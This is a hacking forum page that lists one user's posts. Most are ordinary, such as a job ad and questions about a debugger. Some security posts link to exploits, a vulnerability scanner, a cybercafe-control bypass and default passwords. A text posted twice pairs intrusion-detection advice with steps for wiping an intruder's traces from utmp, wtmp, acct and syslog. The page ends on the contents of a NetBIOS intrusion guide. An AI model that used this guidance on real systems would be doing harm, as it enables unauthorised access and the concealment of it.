Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Rojodos

#1
Hola a todos,

Algunos me conocereis y tal, asi que saludos :)

Busco diseñador/diseñadora freelance para diversos proyectos, y poder tener varias personas a las que pedirle trabajos segun la carga que tengamos.

La idea es diseño photoshop (imagenes, infografias, anuncios adwords, etc...) ademas de diseño web html + php, worpress, drupal, etc..

Obviamente, se pagaria cada trabajo realizado sin problema, via transferencia o Paypal.

Preferiblemente españoles, por el tema del telefono, e incluso si es en Malaga mucho mejor, para poder vernos.

Respondedme aqui si quereis, pero enviadme un mail a rafaelmbaez [at] gmail [dot] com

#2
Pues eso, si alguien tiene una clave del CS - Half Life que no use :P

Si alguno tiene dos claves, me haria un gran favor :)

Salu2
#3
El texto es una introduccion al codeo de exploits sencillos, codeo de shellcodes sencillas, y explicar paso a paso el porque de un stack overflow, todo en Windows. Concretamente, los ejemplos fueron testeados en un Windows XP SP1.

Creo que no contiene errores graves, pero si los contiene, o cualquier otra cosa, no dudeis en decirmelo :)

El texto ha sido redactado por mi, con faltas o sin ellas, con explicaciones enrevesadas, con errores en definiciones, en fin, no sera el mejor texto redactado que hay sobre el tema, ni el unico :P pero me ha gustado redactarlo, y con que ayude a una sola persona, y me de las gracias por email, privado o en el foro, me vale :)

Sinceramente, me ha costado hacerlo (sobre todo tiempo), solo espero que os guste y lo aprovecheis para profundizar mas en el tema. Mi texto es solo la punta del iceberg ;)

Esta como archivo adjunto, para descargarlo, hay que estar registrado :P  ;D (cosas del admin)  ;D

O sino, usar este mirror:

http://www.telefonica.net/web/espaiwebfacultat/Exploits%20y%20Stack%20Overflows%20en%20Windows.zip

Es un texto en formato TXT, a 17 columnas, no creo que haya ningun problema en verlo en cualquier visualizador en cualquier sistema. Puede que en el futuro, se saque en PDF, pero creo que esta mucho mejor en TXT, formato ezine :P

Salu2, espero vuestros comentarios

#5
Pues eso  :D

Este scanner funciona a traves de la linea de comandos en windows, y busca vulnerabilidades tanto en PHP, como XSS o SQL injects.

El problema, aunque tiene un "sistema de fitro anti foros", al chequear un foro (yo he chekeado este, y no ha encontrado ningun fallo, probadlo si kereis) es que genera multitud de entradas (tantas como posts, usuarios, etc..) con lo que para esperar que termine nos podemos quedar esperando.

Aki van los links de info, binario y source:

binary: http://overdose.tcpteam.org/rpvs.exe
code source: http://overdose.tcpteam.org/rpvs_src/

Si dejaran de funcionar, yo subiria los archivos, pero por ahora funcionan. A ver si comentais que tal os parecen el escanner :)

Salu2

Nota de ANELKAOS: Remote PHP Vulnerability Scanner no soporta el escaneo de CGI. Aquí os dejo RPVS.exe dentro de un rar.
#6
Bugs y Exploits / Exploit para Ciber Control 4.0
31 Agosto 2004, 19:00 PM
Os hago un copy paste, pero el original es de la magnifica WWW.CYRUXNET.ORG.

--------------------------------------------------
HackCiber: Exploit para el CiberControl v4
   
Cibercontrol es un programa utilizado por muchos cibercafés para administrar sus redes.
La seguridad que implementa este programa, al menos en su versión 4 es mínima.
G3r4rd nos ha mandado este exploit que consta de dos opciones:

"1) La opcion de liberar se puede hacer localmente o remotamente.

2) La opcion emular ciber puesto sirve para engañar al ordenador central y hacerle creer que el proceso esta ejecutado y supuestamente con todas sus restricciones."

Es aconsejable que todos aquellos establecimientos que usen este programa actualicen su versión.

Mas información en la web del exploit: http://www.fakedos.tk
Web del CiberControl: http://www.lucioperri.net

Exploit compilado: Hackciber
Exploit en C : hackciber.c

Gracias G3r4rd

   
Origen: www.fakedos.tk

-----------------------------

Referencia:

http://cyruxnet.org/archivo.php?20040830

Salu2
#7
Bueno, tenia por ahi guardado un crackme que hice hace bastante tiempo. Los que lo sacaron (miembros colaboradores del foro) me dijeron que, pese a no ser dificil, tiene su "punto".

Ademas, es un crackme en MSDOS, algo distinto a lo que estan acostumbrados la mayoria.

Cualquiera que lo resuelva, que me mande la solucion por privado, y si kiere, yo le paso el source del crackme.

Podeis usar este post para decir que lo habeis resuelto, para duasd, por si no funciona bien, etc etc etc.... cualquier cosa menos postear un user y un serial valido o decir como conseguirlo (eso despues de un tiempo).

CRACKME:

http://www.iespana.es/rojo2/crackmes/crackme.exe

Espero que os guste. Puede que a veces la descarga no este disponible, es que iespana es una mierd....

Salu2
#8
Es un texto muy muy joven (7 Julio 2004), muy completo e interesante.

No os lo podeis perder :D

http://hackaholic.org/Hacking_Unix_2/hacking_unix_2nd.txt

Salu2
#9
Bueno, haciendo "limpieza" en mi PC, pues me encontrado unos 70 textos xD, de diversa indole. Uno de los que mas me gusto, y que he vuelto a leer es este. Creo que a los que traten de "asaltar" un sistema Linux les vendra muy bien, asi como a los que traten de hacer auditorias de seguridad post ataque.

Creo que lo saque en su tiempo de www.infohackers.org, pero no estoy seguro. Si alguien sabe de donde salio este texto, por favor, me lo comunique y sera añadido.

Que lo disfruteis :D

---------------------------------------------------------------------
---------------------------------------------------------------------

Cómo puedo saber si un sistema Linux ha sido comprometido?

Examina los ficheros de log buscando conexiones desde lugares inusuales o cualquier actividad fuera de lo normal. Por ejemplo, mira el ultimo log, "process accounting", todos los logs creados por syslog, y otros logs de seguridad. Si tu firewall o tu router escriben logs en lugares distintos de donde los escribe el sistema estudiado, recuerda chequear también esos logs. Esta no es una garantía completa a no ser que "los logs se escriban en un append-only media"; muchos intrusos editan los ficheros de log para intentar ocultar su actividad.

Busca los ficheros con los bits setid y setgid activados (especialmente los setuid de root) en todo el sistema. Los intrusos suelen dejar copias de programas como /bin/sh o /bin/time con el bit "setuid" activado para permitirles acceso a root mas tarde. Se puede usar el programa de UNIX find(1) para encontrar ficheros con setuid y/o setgid activados.

Comprueba los binarios del sistema para asegurarte de que no han sido alterados. Hay intrusos que cambian programas en sistemas UNIX tales como login, su, telnet, netstat, ifconfig, ls, find, du, df, libc, sync, cualquier binario referenciado en /etc/inetd.conf, y otros programas de red y del sistema críticos, así como librerías de objetos compartidas.

Ten cuidado a la hora de confiar en los backups; tus backups pueden contener a su vez caballos de Troya.

Comprueba que en tu sistema no existan programas no autorizados de monitorización de red, comúnmente llamados sniffer "packet sniffer". Un intruso puede usar un sniffer para capturar información de la cuenta y password de un usuario.

Examina todos los ficheros que son ejecutados por cron y at. Hay intrusos que dejan puertas traseras en ficheros ejecutados por cron o enviados a at, pues permiten al intruso volver al sistema.

También, verifica que todos los ficheros/programas referenciados por los jobs de cron y at, y los ficheros del job en sí mismos, no tienen permisos de escritura para todo el mundo.

Comprueba que no haya servicios no autorizados. Inspecciona el /etc/inetd.conf buscando cambios no autorizados. Busca entradas que ejecuten un programa shell, y verifica todos los programas especificados en /etc/inetd.conf para comprobar que son correctos y que no han sido reemplazados por un caballo de Troya.

También chequea servicios legítimos que hayas comentado en el /etc/inetd.conf. Algún intruso puede haber habilitado un servicio que previamente habías deshabilitado o sustituir el programa inetd por un caballo de Troya.

Examina el fichero /etc/passwd y comprueba las modificaciones de dicho fichero. Verifica que no haya nuevas cuentas creadas sin autorización, cuentas sin password, o cambios en el UID (especialmente UID 0).

Comprueba que no existan entradas no autorizadas en los ficheros de configuración de red y del sistema. En particular, busca entradas con '+' y nombres de hosts externos no apropiados en el fichero /etc/hosts.equiv, /etc/hosts.lpd, y en todos los ficheros .rhosts. Estos ficheros no deben tener permisos de escritura para todo el mundo. Además, confirma que estos ficheros existían previamente a ninguna intrusión y que no han sido creados por el intruso.

Busca por todo el sistema ficheros raros u ocultos, pues estos ficheros pueden usarse para ocultar herramientas e información.

Examina todas las maquinas de la red local cuando busques señales de una intrusión. Si la seguridad de un host se ha visto comprometida, la seguridad de otros en la red también.

CUOTAS

Las cuotas permiten especificar limites en dos aspectos del almacenamiento en disco: El numero de inodos que puede poseer un usuario o un grupo; y el  número de bloques de disco que puede ocupar un usuario o un grupo.

La idea que se esconde detrás de las cuotas es que se obliga a los usuarios a mantenerse debajo de su limite de consumo de disco, quitándoles su habilidad de consumir espacio ilimitado de disco en un sistema.

Las cuotas se manejan en base al usuario y al sistema de ficheros. Si el usuario espera crear ficheros en mas de un sistema de ficheros, las cuotas deben activarse en cada sistema de ficheros por separado.

DETECCION DE INTRUSOS MEDIANTE ANALISIS DE HUELLAS

Ficheros que guardan registros:

utmp: Guarda un registro (log) de los usuarios que están utilizando el sistema mientras estan conectados al sistema. Directorios: /var/adm/utmp y /etc/utmp

wtmp: Guarda un log cada vez que un usuario se introduce en el sistema o sale del sistema. Directorios: /var/adm/wtmp y /etc/wtmp

lastlog: Guarda un log del momento exacto en que un usuario entro por ultima vez. Directorio: /var/adm/lastlog

acct o pacct: Registra todos los comandos ejecutados por cada usuario (aunque no registra los argumentos con que dichos comandos fueron ejecutados). Directorio: /var/adm/acct

Comandos que permiten ver el estado del sistema:

who y users: Permite saber quién esta conectado al sistema en el momento en que ejecutamos el comando.

finger: Lo mismo que el comando who, con el añadido de que podemos saber qué usuarios están conectados a una determinada máquina en el momento en que ejecutamos el comando.

last: Muestra la última vez que se conecto un usuario. Last toma la información que saca en pantalla del fichero wtmp.

ps: Permite saber qué procesos estan siendo ejecutados por el sistema y qué usuarios los ejecutan.

accton: Activa un proceso llamado accounting, que es el que proporciona informacion al fichero acct.

lastcomm: Permite saber qué comandos han ejecutado los usuarios. Lastcomm toma la información que saca por pantalla del fichero acct.

Por lo tanto, si queremos borrar nuestras huellas del sistema, bastar con borrar cualquier log relativo a nuestro usuario de los ficheros utmp, wtmp y acct. Esto se puede hacer de dos formas:

No borramos los ficheros pero los dejamos con cero bytes.

Editar los ficheros con un 'zapper' que pueden borrar los datos relativos a un usuario; en particular de estos ficheros dejando el resto de los datos intacto.

Eliminar huellas de acct

Es bastante complicado borrar nuestras huellas de este fichero; de hecho no se pueden borrar del todo, aunque se puede reducir a una mínima parte nuestra presencia en el sistema.

Más sistemas de log:

Syslog: Mediante el syslog se puede configurar de tal forma que determinados programas, procesos o aplicaciones, generen mensajes que son enviados a determinados ficheros donde quedan registrados dichos mensajes. Este fichero sí puede ser editado en modo texto y puede ser analizado para ver dónde hemos ido dejando rastros y posteriormente borrar esas huellas. Aunque por supuesto, necesitaremos ser root para poder hacerlo.
TCP-Wrapper: Se trata de una aplicacion que proporciona una serie de mecanismos para el registro y filtro de aquellos servicios invocados o llamados a través del inetd (internet daemon). Con esta herramienta el administrador posee un control absoluto de las conexiones hacia y desde su máquina y es informado en todo momento de las conexiones que se han hecho desde su maquina y hacia su máquina.

------------------------------------------------------------------------
------------------------------------------------------------------------
#10
Un coleguilla de otros foros (HpN y HxC) llamado Death Master (esta registrado aqui) me ha pasado un link de un magnifico documento:

http://www.clubhackers.com/death/articles/conf_seg/conf_zh04.pdf

Es una conferencia sobre seguridad, expuesta por el mismo. Esta muy muy interesante, os la recomiendo :)

Gracias Death :)

Salu2
#11
Para una introducción a lo que se trata en este subforo ve a: Taller de Introduccion a Bugs y Exploits

Para una introducción a las vulnerabilidades de stack overflow ve a: Taller de Stack Overflows en Windows

Para una introducción al análisis de vulnerabilidades binarias usando GDB ve a: Uso de GDB para analizar programas sencillos, complejos y vulnerabilidades






FAQ - EXPLOITS

-- BUGS --

Los bugs son fallos en el diseño / implementacion de software (fallos en la programacion normalmente) o hardware (fallos de diseño o de montaje). Estos fallos pueden comprometer al soft/hard, permitiendo que un atacante consiga algun privilegio, alguna informacion, o realize alguna accion para lo que el sistema no estaba programado / implementado.

Por ejemplo, el bug UNICODE de los windows (mas bien en los IIS...), permitia a los que visitaban una web pudieran acceder al directorio principal del disco duro donde estaba alojada la web, y ejecutar una shell con sus respectivos comandos.

Normalmente, los bugs en si no dan nada a los hackers, sino que estos programan "exploits" con los que atacar estos bugs (explicado en EXPLOITS en esta FAQ). Nuevamente, como ejemplo, las contraseñas de los Windows usando LM (LanManager) tienen varios bugs de diseño y algoritmizacion, que hacen que la contraseña no sea tan dificil de romper como deberia. Muchos crackeadores se basan en estos bugs para crackear dichas contraseñas rapidamente. El bug en si no permite nada, pero un exploit basado en ese bug si que lo permite.

Obviamente el caso del UNICODE por ejemplo no necesita exploit (aunq los hay) porque los chicos de Windows se lo curran mucho en la seguridad xDDDD

Hay bugs en los que el hacker no puede conseguir nada (informacion, privilegios) pero puede atacar a la makina, provocando un mal funcionamiento o incluso su caida o reinicio. Esto es llamado DoS (Denial of Service, Denegacion de Servicio).

La palabra "bug" es "bicho" en ingles, y viene de que una polilla (otros hablan de cucarachas) se instalo en la valvula de vacio de un ordenador antiguo (esos que ocupaban una habitacion entera) debido al acogedor calor que emitia. De ahi tambien viene Debugear o Debug, que es buscar el jodido bicho xD. En makinas, se refiere a la depuracion en ejecucion de un programa para encontrar los fallos del mismo.

-- EXPLOITS --
Que Son y ejemplos:
http://www.elhacker.net/exploits/

Como se usan:
http://foro.elhacker.net/index.php?board=32;action=display;threadid=11830

-- SHELLCODES --

http://foro.elhacker.net/index.php?board=32;action=display;threadid=16513

http://www.elhacker.net/exploits

RECOPILACION DE POST INTERESANTES:

BoF en inet network afecta a BIND por Anon
http://foro.elhacker.net/bugs_y_exploits/bof_en_inetnetwork_afecta_a_servidor_dns_bind-t196923.0.html

Analisis de un Bug: 'imlib2' Library 'load()' CVE-2008-5187 por Anon
http://foro.elhacker.net/bugs_y_exploits/analisis_de_un_bug_imlib2_library_load_cve20085187-t237384.0.html

- Mi primera shellcode para un exploit -
http://foro.elhacker.net/index.php/topic,12032.0.html

- Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
http://foro.elhacker.net/index.php?board=32;action=display;threadid=15919

- Aprendiendo Buffers Overflow
http://foro.elhacker.net/index.php?board=32;action=display;threadid=21086

- Como se Usan los Exploits?????
http://foro.elhacker.net/index.php?board=32;action=display;threadid=11830

- Mini manual del concepto exploit
http://foro.elhacker.net/index.php?board=32;action=display;threadid=18915

- Offsets en overflows
http://foro.elhacker.net/index.php?board=32;action=display;threadid=17319

- que es una shellcode?
http://foro.elhacker.net/index.php?board=32;action=display;threadid=16513

- buffer overflow // Desbordamiento de Buffer

http://foro.elhacker.net/index.php?board=32;action=display;threadid=6838

http://foro.elhacker.net/index.php?board=32;action=display;threadid=6151

- Mi primera Shellcode para un exploit!!!
http://foro.elhacker.net/index.php?board=32;action=display;threadid=12032

- Exploit para el overflow del RPC de windows (DCOM)
http://foro.elhacker.net/index.php?board=32;action=display;threadid=15974

- RECOPILATORIO DE EXPLOITS
http://foro.elhacker.net/index.php/topic,32810.0

- Textos sobre Exploits y demas - BIBLIOTECA -
http://foro.elhacker.net/index.php/topic,38455.0

- PEDAZO DE HERRAMIENTA! BUSCA OFFSETS EN DLLS! FINDJMP.EXE!
http://foro.elhacker.net/index.php/topic,22708.0

- LOS FAMOSOS OFFSETS
http://foro.elhacker.net/index.php/topic,37817.0

- Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)
http://foro.elhacker.net/index.php/topic,37176.0

- Aprendiendo a Hackear... utilizando exploit dcom
http://foro.elhacker.net/index.php/topic,36222.0

- Exploit Win 2k/XP (MS03-049) (shell remota)
http://foro.elhacker.net/index.php/topic,22504.0

- Win32Create Admin User Account
http://foro.elhacker.net/index.php/topic,35867.0

- Usar Buffers libres en un Stack Overflow...¿?
http://foro.elhacker.net/index.php/topic,35602.0

- Reverse Shell

http://foro.elhacker.net/index.php/topic,26483.0

- [MOD] ¿Manual de C/C++ orientado a Exploits?
http://foro.elhacker.net/index.php/topic,33996.0

- Aprender hacer shellcode
http://foro.elhacker.net/index.php/topic,23212.0

- Exploits Getadmins en Windows.
http://foro.elhacker.net/index.php?board=32;action=display;threadid=10995

- Format String Vulnerability - De que trata esto...(texto)
http://foro.elhacker.net/index.php/topic,79262.0.html

Tutorial de MetaSploit FrameWork
http://foro.elhacker.net/index.php/topic,93294.0.html

Buffer overflow como si estuviera en primero
http://www.milw0rm.com/papers/278





NIVEL WEB

http://foro.elhacker.net/index.php/topic,49215.0.html
http://www.net-security.org/dl/articles/WASC-TC-v1_0.pdf

- SQL Injection para principiantes, ejemplos en aplicaciones reales.
http://foro.elhacker.net/index.php/topic,142203.0.html
#12
Actualizado

Bueno, pues aunque las herramientas que se mencionan son buenas, sirven, y bastan.. les dejo una pequeña actualización de herramientas, espero les gusten, han sido hechas por el grupo de investigación y desarrollo eEye.

Buscador de offsets estables de direcciones de retorno en ejecutables inestables.

Explotador de Tags y valores en IExplorer con adaptación en archivos de origen binarios, para buscar overflows en contoles ActiveX y tags nativos del navegador.

Manipulador de paquetes de bajo nivel de red tipo Libnet para sistemas NT.

Retina (c) scanners individuales de multiples vulnerabilidades.


Att.
sirdarckcat


Bueno, la he estado probando y ... ES UNA MARAVILLA!!! :D :D :D

Te encuentra offsets como un CALL ESP o un JMP ESP en la libreria que le metas como argumentos. Fijaos:

CitarC:\Documents and Settings\Rojodos\Escritorio>Findjmp kernel32.dll esp

Scanning kernel32.dll for code useable with the esp register
0x79467DDC call esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 1 usable addresses

C:\Documents and Settings\Rojodos\Escritorio>Findjmp user32.dll esp

Scanning user32.dll for code useable with the esp register
0x77E42C75 jmp esp
0x77E44A50 jmp esp
Finished Scanning user32.dll for code useable with the esp register
Found 2 usable addresses

Juaz, es realmente increible :)

Espero que os sirva.

LINKS:

Source en C: http://www.i2s-lab.com/Free-Tools/Findjmp.c

EXE: http://ns2.elhacker.net/h/findjmp.rar


findjmp.zip
MD5 (findjmp.exe) = d6b7b87dc329973df8bcd25087258df6
SHA1 (findjmp.exe) = 8fa51ffd877fc655cd2fccb45e544083a1a47f61

Salu2
#13
Parece muy interesante :)

Lastima que yo ya he aprobado asignaturas relativas al tema, pero puede que le sirva a alguien:

http://www.cmelectronics.8m.com/

Salu2
#14
Hacking / Lista de Passwords por defecto!!!
6 Diciembre 2003, 23:15 PM
Esta es una lista de pares usuario/password de diferentes dispositivos, la mayoria routers, pero tambien se incluyen claves por defecto en entornos windows y Unix.... Una maravilla....

Si teneis un router de los de aki comentados, o usais el password por defecto, os recomendaria que lo cambiarais....

:D

http://www.phenoelit.de/dpl/dpl.html

La lista es enorme y se actualiza medio regularmente.

Espero que os sirva.

Salu2
#15
Ingeniería Inversa / Entrypoint....
3 Diciembre 2003, 15:37 PM
Bueno, tengo una duda que creo que es basica, pero no me aclaro....

El entrypoint es la "punta del hilo" del programa, es decir, donde empieza el codigo del programa...

Pero todo esto cuando se carga en memoria, es decir, en la RAM.

Segun tengo entendido, el 99% de los programas en win se cargan en la direccion 00400000h, no?

Bueno, entonces ese es el entrypoint no?

Pero si se cargan mas ejecutables iguales a ese o simplemente, otros ejecutables?? Donde esta el Entrypoint de cada uno de ellos?

No se cumple la "regla" de cargarse siempre en la direccion 00400000h, ya que ya esta "ocupada" por otro ejecutable. O si se carga...

A ver si alguien me entiende y me resuelve la duda :D

Salu2
#16
Bueno, tras discutir durante un tiempo un script decente para el ranking (goldlink, aadvark....) al final el brujo se ha decidido por el PHP TopSites FREE 2.0 y lo ha puesto en la web.

Teniendo en cuenta que la web la visitan unos 20000 usuarios CADA DIA, es mas que recomendable apuntarse :D

www.elhacker.net/top

www.elhacker.net  --> sección RANKING

Para aquellos webmasters que andan cortos de visitas o simplemente quieren mas :D

Recordad que NO SE ADMITEN WEBS DE CONTENIDO EROTICO....

Tampoco trampas :D:D

Salu2
#17
Examina los ficheros de log buscando conexiones desde lugares inusuales o cualquier actividad fuera de lo normal. Por ejemplo, mira el ultimo log, "process accounting", todos los logs creados por syslog, y otros logs de seguridad. Si tu firewall o tu router escriben logs en lugares distintos de donde los escribe el sistema estudiado, recuerda chequear también esos logs. Esta no es una garantía completa a no ser que "los logs se escriban en un append-only media"; muchos intrusos editan los ficheros de log para intentar ocultar su actividad.

Busca los ficheros con los bits setid y setgid activados (especialmente los setuid de root) en todo el sistema. Los intrusos suelen dejar copias de programas como /bin/sh o /bin/time con el bit "setuid" activado para permitirles acceso a root mas tarde. Se puede usar el programa de UNIX find(1) para encontrar ficheros con setuid y/o setgid activados.

Comprueba los binarios del sistema para asegurarte de que no han sido alterados. Hay intrusos que cambian programas en sistemas UNIX tales como login, su, telnet, netstat, ifconfig, ls, find, du, df, libc, sync, cualquier binario referenciado en /etc/inetd.conf, y otros programas de red y del sistema críticos, así como librerías de objetos compartidas.

Ten cuidado a la hora de confiar en los backups; tus backups pueden contener a su vez caballos de Troya.

Comprueba que en tu sistema no existan programas no autorizados de monitorización de red, comúnmente llamados sniffer "packet sniffer". Un intruso puede usar un sniffer para capturar información de la cuenta y password de un usuario.

Examina todos los ficheros que son ejecutados por cron y at. Hay intrusos que dejan puertas traseras en ficheros ejecutados por cron o enviados a at, pues permiten al intruso volver al sistema.

También, verifica que todos los ficheros/programas referenciados por los jobs de cron y at, y los ficheros del job en sí mismos, no tienen permisos de escritura para todo el mundo.

Comprueba que no haya servicios no autorizados. Inspecciona el /etc/inetd.conf buscando cambios no autorizados. Busca entradas que ejecuten un programa shell, y verifica todos los programas especificados en /etc/inetd.conf para comprobar que son correctos y que no han sido reemplazados por un caballo de Troya.

También chequea servicios legítimos que hayas comentado en el /etc/inetd.conf. Algún intruso puede haber habilitado un servicio que previamente habías deshabilitado o sustituir el programa inetd por un caballo de Troya.

Examina el fichero /etc/passwd y comprueba las modificaciones de dicho fichero. Verifica que no haya nuevas cuentas creadas sin autorización, cuentas sin password, o cambios en el UID (especialmente UID 0).

Comprueba que no existan entradas no autorizadas en los ficheros de configuración de red y del sistema. En particular, busca entradas con '+' y nombres de hosts externos no apropiados en el fichero /etc/hosts.equiv, /etc/hosts.lpd, y en todos los ficheros .rhosts. Estos ficheros no deben tener permisos de escritura para todo el mundo. Además, confirma que estos ficheros existían previamente a ninguna intrusión y que no han sido creados por el intruso.

Busca por todo el sistema ficheros raros u ocultos, pues estos ficheros pueden usarse para ocultar herramientas e información.

Examina todas las maquinas de la red local cuando busques señales de una intrusión. Si la seguridad de un host se ha visto comprometida, la seguridad de otros en la red también.

CUOTAS

Las cuotas permiten especificar limites en dos aspectos del almacenamiento en disco: El numero de inodos que puede poseer un usuario o un grupo; y el  número de bloques de disco que puede ocupar un usuario o un grupo.

La idea que se esconde detrás de las cuotas es que se obliga a los usuarios a mantenerse debajo de su limite de consumo de disco, quitándoles su habilidad de consumir espacio ilimitado de disco en un sistema.

Las cuotas se manejan en base al usuario y al sistema de ficheros. Si el usuario espera crear ficheros en mas de un sistema de ficheros, las cuotas deben activarse en cada sistema de ficheros por separado.

DETECCION DE INTRUSOS MEDIANTE ANALISIS DE HUELLAS

Ficheros que guardan registros:

utmp: Guarda un registro (log) de los usuarios que están utilizando el sistema mientras estan conectados al sistema. Directorios: /var/adm/utmp y /etc/utmp

wtmp: Guarda un log cada vez que un usuario se introduce en el sistema o sale del sistema. Directorios: /var/adm/wtmp y /etc/wtmp

lastlog: Guarda un log del momento exacto en que un usuario entro por ultima vez. Directorio: /var/adm/lastlog

acct o pacct: Registra todos los comandos ejecutados por cada usuario (aunque no registra los argumentos con que dichos comandos fueron ejecutados). Directorio: /var/adm/acct

Comandos que permiten ver el estado del sistema:

who y users: Permite saber quién esta conectado al sistema en el momento en que ejecutamos el comando.

finger: Lo mismo que el comando who, con el añadido de que podemos saber qué usuarios están conectados a una determinada máquina en el momento en que ejecutamos el comando.

last: Muestra la última vez que se conecto un usuario. Last toma la información que saca en pantalla del fichero wtmp.

ps: Permite saber qué procesos estan siendo ejecutados por el sistema y qué usuarios los ejecutan.

accton: Activa un proceso llamado accounting, que es el que proporciona informacion al fichero acct.

lastcomm: Permite saber qué comandos han ejecutado los usuarios. Lastcomm toma la información que saca por pantalla del fichero acct.

Por lo tanto, si queremos borrar nuestras huellas del sistema, bastar con borrar cualquier log relativo a nuestro usuario de los ficheros utmp, wtmp y acct. Esto se puede hacer de dos formas:

No borramos los ficheros pero los dejamos con cero bytes.

Editar los ficheros con un 'zapper' que pueden borrar los datos relativos a un usuario; en particular de estos ficheros dejando el resto de los datos intacto.

Eliminar huellas de acct

Es bastante complicado borrar nuestras huellas de este fichero; de hecho no se pueden borrar del todo, aunque se puede reducir a una mínima parte nuestra presencia en el sistema.

Más sistemas de log:

Syslog: Mediante el syslog se puede configurar de tal forma que determinados programas, procesos o aplicaciones, generen mensajes que son enviados a determinados ficheros donde quedan registrados dichos mensajes. Este fichero sí puede ser editado en modo texto y puede ser analizado para ver dónde hemos ido dejando rastros y posteriormente borrar esas huellas. Aunque por supuesto, necesitaremos ser root para poder hacerlo.
TCP-Wrapper: Se trata de una aplicacion que proporciona una serie de mecanismos para el registro y filtro de aquellos servicios invocados o llamados a través del inetd (internet daemon). Con esta herramienta el administrador posee un control absoluto de las conexiones hacia y desde su máquina y es informado en todo momento de las conexiones que se han hecho desde su maquina y hacia su máquina.

***************************

Fuente:  www.infohackers.org
#18
Link:

http://www.technologismiki.com/en/index-h.html

Llevo usandolo bastante tiempo y es GENIAL.

No solo para cosas de Ing Inversa, sino como Hex Editor en general.

Bajaroslo.
#19
Pongo el link porque es complicado de "ripear" al foro....

LINK:

http://web.frm.utn.edu.ar/comunicaciones/tcp_ip.html

Espero que os sirva a muchos :D

Salu2
#20
Ingeniería Inversa / Duda con el Olly..
9 Septiembre 2003, 03:50 AM
Hay alguna manera de que una ejecucion se pare cuando los registros tengan un valor o rango determinado?

Por ejemplo, quiero q se pare la ejecucion cuando EDX sea 41414141.

Es posible?

Me he mirado por encima el help file del olly y nada. Tampoco en el CMD line help (por cierto, la linea de comandos del Olly es la leche...)

Salu2

#21
© elhacker.net (2009)


Nota: El foro será moderado de forma subjetiva por los moderadores, el reglamento sólo está para aclarar sanciones, y motivos.
#22
Bueno, en 20 minutos me he compuesto un codigo en C/C++ (es un mix xDDD), que genera IPs aleatorias (aleatorias segun la hora del sistema, pues es lo que uso como "semilla");

No es muy eficiente, ni nah, lo hice como "proof of concept" ;). Si alguien lo optimiza y tal, o ve algun error, etc etc... pos que me lo diga o lo postee  :D

Aki va el codigo:

#include <iostream.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
 unsigned int ip[4];
 printf("Generador de IPs aleatorias de 4 octetos por Rojodos\n\n");
 int i = 0;
 srand( (unsigned)time( NULL ) );
 while ( i < 4){
   ip[i] = rand()%255;
   i++;
 }
 printf ("IP generada: %d.%d.%d.%d\n", ip[0], ip[1],ip[2],ip[3]);
 return 0;
}


Aki teneis la salida que me da:

CitarD:\Dev-Cpp\Generador>generadorips
Generador de IPs aleatorias de 4 octetos por Rojodos

IP generada: 43.238.37.111

D:\Dev-Cpp\Generador>generadorips
Generador de IPs aleatorias de 4 octetos por Rojodos

IP generada: 46.22.178.76

D:\Dev-Cpp\Generador>generadorips
Generador de IPs aleatorias de 4 octetos por Rojodos

IP generada: 50.187.64.169

D:\Dev-Cpp\Generador>generadorips
Generador de IPs aleatorias de 4 octetos por Rojodos

IP generada: 53.226.78.135

D:\Dev-Cpp\Generador>

Como veis, los del primer octeto van correlativo, eso es debido a que toma como semilla el reloj del sistema...

Salu2
#23
           
                        Intrusión a sistemas vía [ NetBios ]
                        ------------------------------------
                      | By Zero_Byte || zero_byte@bigfoot.com |

Índice del documento:

                      Parte I: 'Desde Cero'  
                      ---------------------  

- Prologo ....................................................... 0
- Conocimientos básicos ......................................... 1
 - ¿Qué es NetBios? ............................................ 1.1
 - Funcionamiento de NetBIOS ................................... 1.2
 - Nombres en NetBios .......................................... 1.3
 - Comandos .................................................... 1.4
       
                     Parte II: 'Complementos'  
                     ------------------------


- Programas complementarios ..................................... 2
 - LANguard Network Scanner .................................... 2.1
   - Explicación detallada ..................................... 2.1.1
   - Uso de sus funciones ...................................... 2.1.2
   - Requerimientos ............................................ 2.1.3
 - Cerberus Internet Scanner [CIS] ............................. 2.2
   - Explicación detallada ..................................... 2.2.1
   - Uso de sus funciones ...................................... 2.2.2
   - Requerimientos ............................................ 2.2.3
 - NSLookup .................................................... 2.3
 - IP Network Browser .......................................... 2.4
   - Explicación detallada ..................................... 2.4.1
   - Uso de sus funciones ...................................... 2.4.2
   - Requerimientos ............................................ 2.4.3
 - PortScanner ................................................. 2.5
   - Explicación detallada ..................................... 2.5.1
   - Requerimientos ............................................ 2.5.2

                   Parte III: 'Intrusión al sistema'  
                   ---------------------------------


- Escogiendo un blanco .......................................... 3
 - Encontrando el servidor ..................................... 3.1
   - Identificación del servidor ............................... 3.1.1
 - Consiguiendo datos .......................................... 3.2
   - Buscando fallas ........................................... 3.2.1
 - Crackeando el password de red ............................... 3.3
 - Intrusión al sistema ........................................ 3.4
   - Intrusión desde consola ................................... 3.4.1
   - Intrusión rápida .......................................... 3.4.2

                Parte IV: 'Consejos y borrado de huellas'  
                -----------------------------------------


- Una vez dentro ................................................ 4
 - ¿Qué buscar? ................................................ 4.1
 - La web ...................................................... 4.2
- Borrado de huellas ............................................ 5
 - ¿Para qué? .................................................. 5.1
 - Borrando huellas ............................................ 5.2
- Desconectando ................................................. 6

                         Parte V: 'Reflexión'
                         --------------------


- Reflexión ..................................................... 7



                  ==============================



                      Parte I: 'Desde Cero'  
                      ---------------------  

0- [ Prologo ]

    He aquí el manual de 'Intrusión a sistemas vía NetBios'.
Aquí podrás encontrar los pasos a seguir para lograr acceso a un sistema
ajeno mediante este protocolo, sin saber nada sobre este.

La idea de crear este manual surgió cuando decidí actualizar uno de mis
textos que justamente trataba este tema pero con poca información.
Por eso; no solo me he dedicado a explicar mejor los puntos básicos, sino
que he explicado detalladamente desde lo que es NetBios y su modo de uso,
hasta los programas que pueden complementarse y el método de intrusión.

Bueno, creo que con esta introducción ya hay bastante; ahora a lo nuestro.




1- [ Conocimientos básicos ]

    Son necesarios para saber qué es lo que estamos utilizando y su forma
de uso.



1.1- [ Qué es NetBios? ]

